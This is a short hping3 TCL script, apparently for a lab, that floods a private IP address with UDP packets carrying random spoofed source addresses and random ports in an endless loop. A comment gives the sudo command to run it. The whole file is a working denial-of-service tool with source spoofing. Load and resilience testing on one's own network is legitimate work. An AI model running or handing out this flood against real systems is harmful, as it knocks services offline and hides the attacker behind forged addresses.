# Hping3 UDP Flood (random src/dst IP and port) with TCL script

set dst_ip "192.168.100.2"
set count 0

proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    set saddr [random_ip]
    set sport [random_port]
    set dport [random_port]
    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+udp(sport=$sport,dport=$dport)"
    hping send $pkt
    incr count

    if {[expr {$count % 1000}] == 0} {
        puts "$count UDP packets sent so far..."
    }
}

# Comando: sudo hping3 exec udp-tcp_random_source_dest_port.htcl